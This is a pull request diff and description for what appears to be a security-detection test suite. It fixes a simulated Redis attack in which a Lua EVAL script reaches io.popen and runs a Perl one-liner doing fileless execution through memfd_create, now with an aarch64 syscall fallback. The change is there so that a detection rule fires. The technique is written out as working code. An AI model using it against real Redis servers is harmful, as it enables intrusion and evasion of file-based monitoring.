### PR TITLE
fix(redis-attacks): memfd_create syscall fallback for aarch64

### DIFF
--- a/example/redis-attacks.yaml
+++ b/example/redis-attacks.yaml
@@ -30,7 +30,8 @@ attacks:
           end)
         end
         if not io_mod then return 'sandbox_blocked' end
-        local cmd = "perl -e 'my $n=\"bob\\0\";my $fd=syscall(319,$n,0);die if $fd<0;open(my $s,\"<:raw\",\"/bin/cat\");open(my $d,\">&=\",$fd);binmode $d;my $b;while(read($s,$b,8192)){print $d $b}close $s;exec{\"/proc/self/fd/$fd\"}\"cat\",\"/etc/hostname\"'"
+        -- memfd_create: syscall 279 on aarch64, 319 on x86_64. Try aarch64 first.
+        local cmd = "perl -e 'my $n=\"bob\\0\";my $fd=syscall(279,$n,0);if($fd<0){$fd=syscall(319,$n,0);}die if $fd<0;open(my $s,\"<:raw\",\"/bin/cat\");open(my $d,\">&=\",$fd);binmode $d;my $b;while(read($s,$b,8192)){print $d $b}close $s;exec{\"/proc/self/fd/$fd\"}\"cat\",\"/etc/hostname\"'"
         local f = io_mod.popen(cmd)
         if not f then return 'popen_failed' end
         local out = f:read('*a')

--- a/example/redis-tests/attack-01-fileless-memfd.yaml
+++ b/example/redis-tests/attack-01-fileless-memfd.yaml
@@ -24,7 +24,8 @@ attacks:
           end)
         end
         if not io_mod then return 'sandbox_blocked' end
-        local cmd = "perl -e 'my $n=\"bob\\0\";my $fd=syscall(319,$n,0);die if $fd<0;open(my $s,\"<:raw\",\"/bin/cat\");open(my $d,\">&=\",$fd);binmode $d;my $b;while(read($s,$b,8192)){print $d $b}close $s;exec{\"/proc/self/fd/$fd\"}\"cat\",\"/etc/hostname\"'"
+        -- memfd_create: syscall 279 on aarch64, 319 on x86_64. Try aarch64 first.
+        local cmd = "perl -e 'my $n=\"bob\\0\";my $fd=syscall(279,$n,0);if($fd<0){$fd=syscall(319,$n,0);}die if $fd<0;open(my $s,\"<:raw\",\"/bin/cat\");open(my $d,\">&=\",$fd);binmode $d;my $b;while(read($s,$b,8192)){print $d $b}close $s;exec{\"/proc/self/fd/$fd\"}\"cat\",\"/etc/hostname\"'"
         local f = io_mod.popen(cmd)
         if not f then return 'popen_failed' end
         local out = f:read('*a')


### PR DESCRIPTION
## Summary

Redis attack-01 (fileless execution via memfd_create → execve, triggers R1005) hard-coded syscall number 319 inside a perl one-liner embedded in a Lua EVAL. That's the x86_64 number; aarch64 is 279. On aarch64 the attack silently failed and R1005 never fired.

Adds a two-step fallback: try 279 first (aarch64), fall back to 319 (x86_64). Matches the same pattern the Go-side attack implementation already uses in `pkg/attack/fileless.go`.

## Scope

Two files updated — the main redis attack suite and the individual per-attack file:

- `example/redis-attacks.yaml`
- `example/redis-tests/attack-01-fileless-memfd.yaml`

No other attacks affected; no runner/Go changes needed.

## Test plan
- [x] YAML parses (`python3 -c "import yaml; yaml.safe_load(...)"`)
- [ ] CI run on `main`-matrix remains green on x86_64 runners (no regression)
- [ ] arm64 dev box: R1005 now fires via the YAML path (tracked separately, local validation)